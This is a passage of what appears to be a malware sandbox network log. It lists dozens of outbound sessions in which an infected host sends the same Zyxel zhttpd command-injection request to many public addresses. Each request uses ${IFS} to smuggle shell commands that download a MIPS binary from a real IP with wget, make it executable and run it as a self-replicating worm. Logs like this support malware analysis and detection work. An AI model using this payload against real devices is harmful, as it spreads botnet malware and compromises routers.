                                      Jan 19, 2024 17:29:21.548742056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1747192.168.2.145224851.21.100.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548770905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1748192.168.2.1460776217.80.157.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548825026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1749192.168.2.1445180106.216.43.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548852921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1750192.168.2.1433850104.56.86.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548902988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1751192.168.2.1452714102.9.28.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548933029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1752192.168.2.144245820.63.65.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548957109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1753192.168.2.1443230218.29.129.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.548989058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1754192.168.2.1449932185.244.76.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549011946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1755192.168.2.145674258.61.173.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549055099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1756192.168.2.143953812.5.248.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549089909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1757192.168.2.1445124131.166.20.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549148083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1758192.168.2.145264681.143.147.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549165010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1759192.168.2.145845227.203.57.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549220085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1760192.168.2.1442662166.149.255.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549309015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1761192.168.2.1446036100.146.228.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549343109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1762192.168.2.144353261.80.104.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549382925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1763192.168.2.1450686109.22.104.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549417973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1764192.168.2.1441886192.60.194.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549444914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1765192.168.2.143655650.241.44.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549478054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1766192.168.2.144236823.94.19.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549499989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1767192.168.2.145377212.200.238.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549554110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1768192.168.2.144584486.216.24.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549581051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1769192.168.2.1448978133.41.203.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549612045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1770192.168.2.143442219.202.203.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549640894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1771192.168.2.144852267.44.178.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549680948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1772192.168.2.1447416105.179.166.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549696922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1773192.168.2.145040473.43.27.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549727917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1774192.168.2.1456236212.47.211.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549776077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1775192.168.2.144451214.18.3.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549813986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1776192.168.2.1436912207.64.23.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549829960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1777192.168.2.1455984139.30.206.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549892902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1778192.168.2.1450704155.165.65.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549923897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1779192.168.2.1433452140.105.207.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549968004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1780192.168.2.1455046169.117.238.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.549998999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1781192.168.2.1447668182.187.48.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550039053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1782192.168.2.1440474134.242.233.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550067902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1783192.168.2.1433092109.51.165.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550087929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1784192.168.2.145282431.246.68.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550124884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1785192.168.2.14328369.163.120.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550180912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1786192.168.2.1434392139.0.205.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550204039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1787192.168.2.1434992110.107.65.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550225019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1788192.168.2.143700040.72.121.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550263882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1789192.168.2.144857652.244.233.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550299883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1790192.168.2.1437798202.91.200.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550323963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1791192.168.2.144061651.221.27.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550365925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1792192.168.2.144357069.73.50.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550406933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1793192.168.2.1446800202.242.116.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550434113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1794192.168.2.1444130151.238.157.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550476074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1795192.168.2.145936414.53.82.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550493956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1796192.168.2.1442082163.121.91.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550532103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1797192.168.2.143886632.84.171.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550586939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1798192.168.2.1436810108.253.176.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550621986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1799192.168.2.14499809.49.200.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550663948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1800192.168.2.143892836.223.20.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550693989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1801192.168.2.1437570216.240.23.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550743103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1802192.168.2.1452552126.182.186.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550765991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1803192.168.2.143727268.107.2.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550791025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1804192.168.2.1444992121.86.104.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550812006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1805192.168.2.1444618148.105.152.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550851107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1806192.168.2.1449656131.251.86.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550869942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1807192.168.2.144399097.187.66.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550904036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1808192.168.2.1457392110.78.37.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550931931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1809192.168.2.144572467.98.119.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.550962925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1810192.168.2.1447950177.140.131.184443
                                      TimestampBytes transferredDirectionData
